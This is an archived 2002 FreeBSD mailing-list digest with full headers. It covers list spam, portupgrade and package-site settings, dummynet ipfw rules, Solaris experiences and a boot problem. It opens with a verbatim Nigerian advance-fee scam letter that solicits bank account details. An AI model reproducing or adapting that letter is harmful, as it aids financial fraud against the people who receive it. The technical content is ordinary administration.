Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ATTN:SIR AM WRITING TO YOU FOLLOWING THE IMPRESSIVE INFORMATION I GOT ABOUT YOU THROUGH A CONSULTANCY FIRM UNDER NIGERIAN BAR ASSOCIATION. HE ASSURED ME OF YOUR CAPABILITY AND RELIABILITY TO CHAMPION THIS BUSINESS OPPORTUNITY. IN A FORMAL INTRODUCTION I AM BARRISTER BELLO MUSA. A SOLICITOR AT LAW AND SENIOR ADVOCATE OF NIGERIA (SAN) EQUALY AN ATTORNEY TO ONE OF YOUR NATIONALS WHO RUNS A CONTRACTING FIRM IN NIGERIA AFTER SHALL BE REFERRED AS MY CLIENT.ON JANUARY 4TH 1998 MY CLIENT, HIS WIFE&THEIR THREE CHILDREN WERE INVOLVED IN GHASTLY AUTO CRASH AND UNFORTUNATELY ALL LOST THEIR LIVES, SINCE THEN I HAVE MADE SEVERAL ENQUIRIES TO YOUR EMBASSY TO LOCATE ANY OF MY CLIENT'S EXTENDED RELATIVES, THIS HAS ALSO PROVED ABORTIVE,AFTER THESE SEVERAL UNSUCCESSFUL ATTEMPTS, TO LOCATE ANY MEMBER OF HIS FAMILY TO PRESENT AS NEXT OF KIN IN RESPECT OF THE SUM OF US$23.5M(TWENTY THREE MILLION FIVE HUNDRED THOUSAND UNITED STATES DOLLARS ONLY) DEPOSITED WITH UNION BANK OF NIGERIA BY MY LATE CLIENT OF WHICH THE BANK HAS CONTACTED ME TO PROVIDE THE NEXT OF KIN TO MY CLIENT TO COME OVER AND CLAIM HIS MONEY BECAUSE THEY CANNOT RELEASE IT UNLESS SOMEBODY APPLIES THROUGH ME FOR IT, AS NEXT OF KIN OR RELATION TO THE DECEASED AS INDICATED IN THEIR BANKING GUIDELINES. AS NOBODY WAS LEFT BEHIND FOR THE CLAIM. IT IS THEREFORE UPON THIS DISCOVERY THAT I NOW DECIDED TO MAKE BUSINESS WITH YOU AND PROCESS THE RELEASE / TRANSFER OF THE MONEY TO YOU AS THE NEXT OF KIN OR RELATIONS OF MY DECEASED CLIENT FOR SAFETY AND SUBSEQUENT DISBURSEMENT SINCE NOBODY IS COMING FOR IT AND I DON'T WANT THIS MONEY TO GO INTO DISBURSEMENT ACCOUNT AS UNCLAIMED BILLAS THE BANKING LAW AND GUIDELINES WHERE THE DEPOSITE WAS MADE STIPULATED THAT IF SUCH MONEY REMAINED UNCLAIMED AFTER FOUR YEARS THE MONEY WILL BE TRANSFERRED INTO FEDERAL GOVERNMENT ACCOUNT AS UNCLAIMED FUND HENCE THEY HAVE NOTIFIED ME OF THE DEVELOPMENT AND INSTRUCTED ME TO PROVIDE THE NEXT OF KIN WITHIN 14 DAYS. THE REQUEST OF A FOREIGNER AS NEXT OF KIN IN THIS BUSINESS IS OCCASIONED BY THE FACT THAT MY CLIENT WAS A FOREIGNER AND A NIGERIAN CANNOT STAND AS NEXT OF KIN TO A FOREIGNER. I AGREE THAT 40% OF THIS MONEY WILL BE FOR YOU AS FOREIGN PARTNER AND 10% FOR EXPENSES INCURRED DURING THE COURSE OF REMITTANCE & 50% FOR ME THEREAFTER TO THE PERCENTAGES INDICATED. THEREFORE TO ENABLE THE IMMEDIATE PROCESSING OF THE TRANSFER OF THE FUND TO YOU AS ARRANGED. YOU MUST PROVIDE ACCOUNT PARTICULARS WHICH I WILL USE TO APPLY TO THE BANK REFERRING YOU AS THE NEXT OF KIN /RELATION OF MY DECEASED CLIENT INDICATING YOUR BANK ACCOUNT NUMBER AND LOCATION WHERE IN THE MONEY WILL BE REMITTED . UPON RECEIPT OF YOUR REPLY I WILL BRIEF YOU DEEPLY ON HOW EVERY THING WILL BE DONE AS YOU RECEIVE THIS LETTER& WILLING TO ASSIST IN THIS ONES IN LIFE TIME OPPORTUNITY, YOU SHOULD CONTACT ME AT ONCE THROUGH THE EMAIL ADDRESSES ONLY AND INDICATE YOUR DIRECT CONFIDENTIAL TELEPHONE/FAX NUMBERS FOR THE EFFECTIVE COMMUNICATION REQUIRED I ADVISE YOU TO GIVE THIS TRANSACTION THE MAXIMUM CONFIDENTIALITY IT REQUIRES BECAUSE OF IT'S NATURE AND I WILL NOT LIKE TO DENT MY IMAGE . TRUSTING TO HEARING FORM YOU IMMEDIATELY. YOURS FAITHFULLY, BARRISTER BELLO MUSA CONTACT ME THROUGH THIS TEL/FAX 234-1-7596854 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 14:43:58 2002 Delivered-To: freebsd-questions@freebsd.org Received: from freebsd.identd.net (freebsd.identd.net [64.172.21.203]) by hub.freebsd.org (Postfix) with ESMTP id 32C4137B408 for ; Sun, 23 Jun 2002 14:43:47 -0700 (PDT) Received: from freebsd.identd.net (az@localhost [127.0.0.1]) by freebsd.identd.net (8.12.3/8.12.2) with SMTP id g5NLhlCI017666; Sun, 23 Jun 2002 14:43:47 -0700 (PDT) (envelope-from az@freebsd.identd.net) Date: Sun, 23 Jun 2002 14:43:47 -0700 From: "Ayman Zarka." To: Larry Rosenman Cc: "FreeBSD Questions." Subject: Re: Spam problem on the list (Was: Re: URGENT) Message-Id: <20020623144347.124061c6.az@freebsd.identd.net> In-Reply-To: <1024866117.69414.29.camel@lerlaptop> References: <3D15D17C.26108.158E3FFA@localhost> <3D15D381.5846.1596237C@localhost> <1024866117.69414.29.camel@lerlaptop> Organization: identd.net X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i386-portbld-freebsd4.5) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 23 Jun 2002 16:01:56 -0500 Larry Rosenman wrote: |Where is the current hardware configuration posted, and what does the |community expect it would take to implement the appropriate |protection? | |I can donate something, and might be able to get others as well. | |I use FreeBSD *A LOT* and recommend it to my consulting/contract |clients. I agree with Larry. If it's a hardware matter, I'm sure there are many people in the list who are willing to contribute. count me in. :) -- - Ayman Zarka PGP Fingerprint: 4016 83E9 5AD2 B492 BE30 A95E 95F7 6A2C 2D8A 1FE1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 14:44:49 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 4F35E37B403 for ; Sun, 23 Jun 2002 14:44:43 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com; Sun, 23 Jun 2002 14:44:41 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: Corey Snow , Larry Rosenman Date: Sun, 23 Jun 2002 14:44:41 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Spam problem on the list (Was: Re: URGENT) Reply-To: pjklist@ekahuna.com Cc: questions@FreeBSD.ORG, Ruben de Groot References: <3D15D17C.26108.158E3FFA@localhost> In-reply-to: <1024865486.69414.26.camel@lerlaptop> X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020623214441560.AAA732@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 23 Jun 2002, at 15:51, Larry Rosenman boldly uttered: > The technology to virus scan and SPAM scan exists, and runs on FreeBSD. > My question is why isn't it deployed on the hub.freebsd.org server(s)? Oh, they're doing spam blocking already - rumor has it spam hits hub.freebsd.org about once a second. (of course, that server also serves various individual mail accounts as well, not just the lists) However, they are not: 1) blocking attachments 2) requiring membership to post 3) using DNS-based or other externally-ruled blocklists 4) keeping close tabs on the content and mitigating specific problems in a timely manner #1 is due basically to tradition and feeling that it helps new users #2 see #1 #3 could be for performance reasons, not sure #4 is probably due to lack of manpower, perhaps resistance to change Where us users could help out might be in item #4, or another idea might be to split up list functions onto a different box than the one that handles everything @freebsd.org, and implement different rules/policies on it. I might even have a server I could donate to the cause, and I'm probably within a 45 min drive of where the stuff is currently hosted. That is unless the "status quotians" (a new, -er I mean old lifeform) don't drown out the suggestion with the familiar "we don't need help, nothing's broken" response. > I've gotten more virii this weekend to the FreeBSD lists I subscribe to > than any other place. As have I. -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 14:54:55 2002 Delivered-To: freebsd-questions@freebsd.org Received: from midway.uchicago.edu (midway.uchicago.edu [128.135.12.12]) by hub.freebsd.org (Postfix) with ESMTP id C92DC37B408 for ; Sun, 23 Jun 2002 14:54:27 -0700 (PDT) Received: from Yggdrasil (adsl-68-20-39-162.dsl.chcgil.ameritech.net [68.20.39.162]) by midway.uchicago.edu (8.12.2/8.12.2) with ESMTP id g5NLsQDT003550; Sun, 23 Jun 2002 16:54:26 -0500 (CDT) Content-Type: text/plain; charset="iso-8859-1" From: David Syphers Reply-To: dsyphers@uchicago.edu To: Larry Rosenman , Corey Snow Subject: Re: Spam problem on the list (Was: Re: URGENT) Date: Sun, 23 Jun 2002 16:54:26 -0500 User-Agent: KMail/1.4.1 Cc: questions@FreeBSD.ORG References: <3D15D17C.26108.158E3FFA@localhost> <1024865486.69414.26.camel@lerlaptop> In-Reply-To: <1024865486.69414.26.camel@lerlaptop> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200206231654.26516.dsyphers@uchicago.edu> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sunday 23 June 2002 03:51 pm, Larry Rosenman wrote: > The technology to virus scan and SPAM scan exists, and runs on FreeBSD. > My question is why isn't it deployed on the hub.freebsd.org server(s)? It _is_. As Kris Kennaway keeps pointing out, most recently on June 20, 2002. In this thread, in fact. Maybe you thought his email was spam. Dunno. To quote, ---- In fact 99% of spam is bounced by freebsd.org mailservers, which are hit with an attempted spam about once per second. ---- Still, I don't doubt that intelligent and creative suggestions for better filtering methods would be welcome, as would hardware donations. I would assume you should contact the postmaster about the former, and not questions@. -David -- Everyone who believes in telekinesis, raise my hand... Astronomy and Astrophysics Center The University of Chicago To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 15: 0:21 2002 Delivered-To: freebsd-questions@freebsd.org Received: from anchor-post-32.mail.demon.net (anchor-post-32.mail.demon.net [194.217.242.90]) by hub.freebsd.org (Postfix) with ESMTP id 25D9A37B407 for ; Sun, 23 Jun 2002 15:00:09 -0700 (PDT) Received: from jrpenn.demon.co.uk ([194.222.241.254]) by anchor-post-32.mail.demon.net with esmtp (Exim 3.35 #1) id 17MFOr-00081q-0W for freebsd-questions@freebsd.org; Sun, 23 Jun 2002 23:00:05 +0100 Received: (from jeff@localhost) by jrpenn.demon.co.uk (8.11.6/8.11.6) id g5NM0jc00424 for freebsd-questions@freebsd.org; Sun, 23 Jun 2002 23:00:45 +0100 (BST) (envelope-from jeff) Date: Sun, 23 Jun 2002 23:00:45 +0100 From: Jeff Penn To: freebsd-questions@freebsd.org Subject: Re: portupgrade with package Message-ID: <20020623230045.A345@jrpenn.demon.co.uk> Mail-Followup-To: freebsd-questions@freebsd.org References: <3D14AB05.9040302@potentialtech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from noackjr@compgeek.com on Sat, Jun 22, 2002 at 02:55:54PM -0500 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, Jun 22, 2002 at 02:55:54PM -0500, Jon Noack wrote: > To summarize, the ports tree doesn't require a tag and is for all versions. > Certain ports may require specific versions of FreeBSD, but this is port > specific and is not systemic. An example of the universal nature of the > > Packages, on the hand, are ports built for specific branches (or for > releases). If you are running 4.5-RELEASE-p4, you would not want to run a > package built for -CURRENT. It would most likely fail to work at all. Look > into setting PACKAGESITE Thanks for all the responses which have cleared up my confusion with this issue. I have realised that portupgrade was failing to find the packages because I have not congfigured pkgtools.conf. I need to work on the configuration to direct portupgrade to a suitable directory. Jeff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 15:32:45 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 6328B37B405 for ; Sun, 23 Jun 2002 15:32:39 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com for ; Sun, 23 Jun 2002 15:32:38 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: questions@FreeBSD.ORG Date: Sun, 23 Jun 2002 15:32:38 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: [OFF] FreeBSD vs Solaris - Opinions? Reply-To: pjklist@ekahuna.com In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020623223238911.AAA703@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Date: Sun, 23 Jun 2002 10:57:01 -0400 > From: Miroslav Pendev > > I am not familiar with the kernel differences but here is what I can tell you: > > I use to deal with Solaris 8 for Intel's hardware recently and it was > nightmare to get it working with my hardware until I remove anithing that > wasn't in Sun's Hardware Compatibility List - in this case ... 3Com 905C NIC. > In the list was 3Com 905B ;-))) Well the next version Solaris 8 10 01 was with > support for my card, but ... Funny you should mention that.. because it's the exact reason I stopped messing around with Solaris/x86. I couldn't get what is probably the most popular SCSI card on the market (Adaptec 2940 series) working with Solaris 2.5. Spent a lot of time messing with it, then discovered that they had patched a problem with the driver, in Solaris 2.5.1. (2.5.1 was itself just a collection of patches for 2.5) Well I called up Sun, using that lovely free corporate support, only to discover A) even though 2.5.1 was virtually identical to 2.5, they had *no* intention of fixing that driver or making it available for Solaris 2.5, and B) I'd have to spend hundreds of dollars to upgrade, just to get that ultra-common SCSI card to work. That was the last time I wanted anything more to do with proprietary Unix OS's. If I wanted that kind of nonsense, I could just use Microsoft. -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 15:50:49 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp2.mbox.com.au (203-134-146-019.cust.pth.iprimus.net.au [203.134.146.19]) by hub.freebsd.org (Postfix) with ESMTP id 51C2337B400 for ; Sun, 23 Jun 2002 15:50:44 -0700 (PDT) Received: from nms2.mbox.com.au (webmail.mbox.com.au [192.168.20.4]) by smtp2.mbox.com.au (Sun Internet Mail Server sims.4.0.2000.05.17.04.13.p6) with ESMTP id <0GY6006EZKJBX7@smtp2.mbox.com.au> for freebsd-questions@FreeBSD.ORG; Mon, 24 Jun 2002 06:45:11 +0800 (WST) Received: from mbox.com.au ([127.0.0.1]) by nms2.mbox.com.au (Netscape Messaging Server 4.15) with ESMTP id GY6KMP03.7D6 for ; Mon, 24 Jun 2002 06:47:13 +0800 Date: Mon, 24 Jun 2002 08:47:13 +1000 From: BSD Freak Subject: Dummynet not working To: FreeBSD Questions Message-id: <1794eaa1798343.17983431794eaa@mbox.com.au> MIME-version: 1.0 X-Mailer: Netscape Webmail Content-type: text/plain; charset=us-ascii Content-language: en Content-disposition: inline Content-transfer-encoding: 7BIT X-Accept-Language: en Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi all, I'm relatively inexperienced when it comes to dummynet but I have read the man page and lots more about it. Basically the situation is this: We have a FreeBSD 4.5R router (with dummynet compiled in the kernel) running a 64Kbps ISDN line to another site. The line is usually saturated making access very slow and unreliable for some hosts on the network. We have one host (192.168.0.50) on the network that is particularly important and which requires priority access. So I added the following rules, but this does not seem to help: ipfw pipe 1 config bw 64Kbit/s ipfw queue 1 config pipe 1 weight 90 ipfw queue 2 config pipe 1 weight 1 ipfw add 400 queue 1 tcp from 192.168.0.50 to any ipfw add 500 queue 2 ip from any to any What am I doing wrong? Any help would be greatly appreciated.... --------------------------------------------------------------------- NEW to mBox, receive faxes to any email address! Find out more http://www.mbox.com.au/fax To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 15:59:10 2002 Delivered-To: freebsd-questions@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 29A7737B400 for ; Sun, 23 Jun 2002 15:59:00 -0700 (PDT) Received: from fledge.watson.org (localhost [127.0.0.1]) by fledge.watson.org (8.12.3/8.12.3) with ESMTP id g5NMwuw5010516; Sun, 23 Jun 2002 18:58:57 -0400 (EDT) (envelope-from doug@safeport.com) Received: from localhost (doug@localhost) by fledge.watson.org (8.12.3/8.12.3/Submit) with SMTP id g5NMwu09010513; Sun, 23 Jun 2002 18:58:56 -0400 (EDT) X-Authentication-Warning: fledge.watson.org: doug owned process doing -bs Date: Sun, 23 Jun 2002 18:58:55 -0400 (EDT) From: doug X-Sender: doug@fledge.watson.org To: Jon Noack Cc: Jeff Penn , freebsd-questions@freebsd.org Subject: RE: portupgrade with package In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG And then this works how?? zeus:/home/doug/temp# pkg_add -r XFree86-4.2.0_1,1.tgz Error: FTP Unable to get ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/Latest/XFree86-4.2.0_1,1.tgz: File unavailable (e.g., file not found, no access) pkg_add: unable to fetch `ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/Latest/XFree86-4.2.0_1,1.tgz' by URL This tar is structured like a port except that it (presumably) points to compiled source. I previously downloaded the file following a slightly different path. But if diff'ing the files they are the same. Certainly they give the same error (for me). Files in the tar ball are: +CONTENTS +COMMENT +DESC +DISPLAY +MTREE_DIRS On Sat, 22 Jun 2002, Jon Noack wrote: > > You're getting confused about what ports and packages are. First off, > > they're not the same thing. > > I would reread the handbook section on ports/packages. This page is > > particularly informative for you: > > http://www.freebsd.org/handbook/x4300.html > > To summarize, the ports tree doesn't require a tag and is for all versions. > Certain ports may require specific versions of FreeBSD, but this is port > specific and is not systemic. An example of the universal nature of the > port system can be seen in the Makefile for the OpenSSL port: > > .if exists(/usr/lib/libssl.a) && ${OSVERSION} >= 460000 > FORBIDDEN= "OpenSSL is already in the base system" > .endif > > The OpenSSL port will not install (by default) on FreeBSD 4.6 (and -STABLE > and -CURRENT) because an updated version of it is already installed. For > > Packages, on the hand, are ports built for specific branches (or for > releases). If you are running 4.5-RELEASE-p4, you would not want to run a > package built for -CURRENT. It would most likely fail to work at all. Look > into setting PACKAGESITE > (PACKAGESITE=ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/ > All/) and then try the update. Or, just download the file > (ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/All/XFree86- > 4.2.0_1,1.tgz) to /usr/ports/distfiles manually and then run the update. I > don't use packages so I'm sure there is some more permanent and clean way to > make this work in the future. > > Jon > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 16: 1:43 2002 Delivered-To: freebsd-questions@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 1845437B403 for ; Sun, 23 Jun 2002 16:01:40 -0700 (PDT) Received: from fledge.watson.org (localhost [127.0.0.1]) by fledge.watson.org (8.12.3/8.12.3) with ESMTP id g5NN1Xw5010533; Sun, 23 Jun 2002 19:01:33 -0400 (EDT) (envelope-from doug@safeport.com) Received: from localhost (doug@localhost) by fledge.watson.org (8.12.3/8.12.3/Submit) with SMTP id g5NN1TNR010530; Sun, 23 Jun 2002 19:01:29 -0400 (EDT) X-Authentication-Warning: fledge.watson.org: doug owned process doing -bs Date: Sun, 23 Jun 2002 19:01:29 -0400 (EDT) From: doug X-Sender: doug@fledge.watson.org To: Jon Noack Cc: loki_bsd@cox.net, freebsd-questions@freebsd.org Subject: RE: portupgrade with package In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG shoulda read further - I will try this; sorry, next time I will read the entire thread before posting. On Sat, 22 Jun 2002, Jon Noack wrote: > > With all this said, how do you tell portupgrade which packages folder to > > look in? Mine always wants to look in packages-4.6-stable which does not > > exist. > Did you read my post? > > > Look into setting > PACKAGESITE(PACKAGESITE=ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/package > s-4-stable/All/) and then try the update. > > > Jon > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 16:23:11 2002 Delivered-To: freebsd-questions@freebsd.org Received: from patriarch.dnsalias.org (adsl-65-69-1-221.dsl.hstntx.swbell.net [65.69.1.221]) by hub.freebsd.org (Postfix) with ESMTP id B79F137B403 for ; Sun, 23 Jun 2002 16:23:05 -0700 (PDT) Received: from compgeek ([127.0.0.1]) by patriarch.dnsalias.org with Microsoft SMTPSVC(5.0.2195.4905); Sun, 23 Jun 2002 18:23:05 -0500 Reply-To: From: "Jon Noack" To: Subject: RE: portupgrade with package Date: Sun, 23 Jun 2002 18:23:05 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: X-OriginalArrivalTime: 23 Jun 2002 23:23:05.0543 (UTC) FILETIME=[ED59AD70:01C21B0C] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > zeus:/home/doug/temp# pkg_add -r XFree86-4.2.0_1,1.tgz If you've already gotten the package you don't need the "-r" option. From the pkg_add man page: -r Use the remote fetching feature. This will determine the appro- priate objformat and release and then fetch and install the pack- age. Jon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 16:29:19 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.kristal.ru (mail.kristal.ru [195.161.155.118]) by hub.freebsd.org (Postfix) with ESMTP id 8245637B403 for ; Sun, 23 Jun 2002 16:29:08 -0700 (PDT) Received: by mail.kristal.ru (Postfix, from userid 426) id 594A926D; Mon, 24 Jun 2002 09:29:06 +1000 (YAKST) Received: from c1110101.CRYSTALL.local (c1110101.CRYSTALL.local [192.168.1.253]) by mail.kristal.ru (Postfix) with ESMTP id 3640D26A; Mon, 24 Jun 2002 09:29:06 +1000 (YAKST) Date: Mon, 24 Jun 2002 09:29:06 +1000 From: Igor Kulemzin X-Mailer: The Bat! (v1.45) Personal X-Priority: 3 (Normal) Message-ID: <132231777197.20020624092906@kristal.ru> To: BSD Freak Cc: freebsd-questions@freebsd.org Subject: Re: Dummynet not working In-reply-To: <1794eaa1798343.17983431794eaa@mbox.com.au> References: <1794eaa1798343.17983431794eaa@mbox.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, When I use dummynet, my rules was written like below: ipfw add pipe 1 tcp from 192.168.1.5 to 192.168.1.6 ipfw pipe 1 config bw 64kbit/s but not like yours: ipfw queue 1 config pipe 1 weight 90 ipfw queue 2 config pipe 1 weight 1 ipfw add 400 queue 1 tcp from 192.168.0.50 to any ipfw add 500 queue 2 ip from any to any Try to change order of your rules. Monday, June 24, 2002, 8:47:13 AM, you wrote: BF> Hi all, BF> I'm relatively inexperienced when it comes to dummynet but I have read BF> the man page and lots more about it. Basically the situation is this: BF> We have a FreeBSD 4.5R router (with dummynet compiled in the kernel) BF> running a 64Kbps ISDN line to another site. The line is usually BF> saturated making access very slow and unreliable for some hosts on the BF> network. We have one host (192.168.0.50) on the network that is BF> particularly important and which requires priority access. So I added BF> the following rules, but this does not seem to help: BF> ipfw pipe 1 config bw 64Kbit/s BF> ipfw queue 1 config pipe 1 weight 90 BF> ipfw queue 2 config pipe 1 weight 1 BF> ipfw add 400 queue 1 tcp from 192.168.0.50 to any BF> ipfw add 500 queue 2 ip from any to any BF> What am I doing wrong? BF> Any help would be greatly appreciated.... BF> --------------------------------------------------------------------- BF> NEW to mBox, receive faxes to any email address! BF> Find out more http://www.mbox.com.au/fax BF> To Unsubscribe: send mail to majordomo@FreeBSD.org BF> with "unsubscribe freebsd-questions" in the body of the message -- Monday, June 24, 2002 9:25:01 AM Best regards, Igor Kulemzin Amursky Crystall, http://www.kristal.ru E-mail: ivk@kristal.ru -> This would easier understand fewer had omitted. -> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 16:44:58 2002 Delivered-To: freebsd-questions@freebsd.org Received: from ns5.eds.com (ns5.eds.com [203.17.185.230]) by hub.freebsd.org (Postfix) with ESMTP id AF6EE37B401 for ; Sun, 23 Jun 2002 16:44:53 -0700 (PDT) Received: from nnsy.eds.com (nnsy-3.eds.com [192.168.1.1]) by ns5.eds.com (8.11.6/8.11.1) with ESMTP id g5NNipG20585 for ; Mon, 24 Jun 2002 09:44:51 +1000 (EST) Received: from nnsy.eds.com (localhost [127.0.0.1]) by nnsy.eds.com (8.11.6/8.11.6) with ESMTP id g5NNin310675 for ; Mon, 24 Jun 2002 09:44:49 +1000 (EST) Received: from ausym000.exau01.exch.eds.com ([134.251.177.117]) by nnsy.eds.com (8.11.6/8.11.6) with ESMTP id g5NNilF10653 for ; Mon, 24 Jun 2002 09:44:48 +1000 (EST) Received: by AUSYM000 with Internet Mail Service (5.5.2653.19) id ; Mon, 24 Jun 2002 09:44:30 +1000 Message-ID: <16649A8D5C73D51183B80008C728EEB7CC0AAD@AUSYM103> From: "Pietralla, Siegfried P" To: freebsd-questions@FreeBSD.ORG Subject: yet another boot problem Date: Mon, 24 Jun 2002 09:45:05 +1000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG hi all, i'm having a problem getting my new install of 4.5 to boot. i've successfully run through the install onto ad3s3 and the boot manager for the second disk comes up ( and lets me go back to disk one so i know it's working ) but when i pick 'f3' it just beeps at me. i can boot into 4.3 in ad0s3, then i mount ad3s3a onto /u33a, 'cd /u33a/boot', 'disklabel -B -b ./boot1 -s ./boot2 ad3s3' but it still doesn't help. i did successfully install 4.5 onto this disk a few weeks ago but i had it limited to 32Gb with a jumper on the disk since my bios wouldn't recognize it otherwise. now i'm running a new bios and i can see the whole disk. i 'fdisk'ed and 'disklabel'ed it from 4.3 using a geometry of 116301/16/63 which is reflected by dmesg when i boot up from the install cd but when i step through the installer it doesn't like this at all and insists on something like 7000/255/63. is this what's causing my problem? if so, how can i install 4.5 without going through the disk slicing and labelling part of the installer? why can i mount ad3s3a? this seems to imply everything's o.k. i did 'dd if=/dev/ad3s3 count=1 | od -c' and this looks the same as /u33a/boot/boot1. is this correct? where can i check boot2? and can i install it manually with dd? let me know if you want any more info. thanx, siegfried. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe 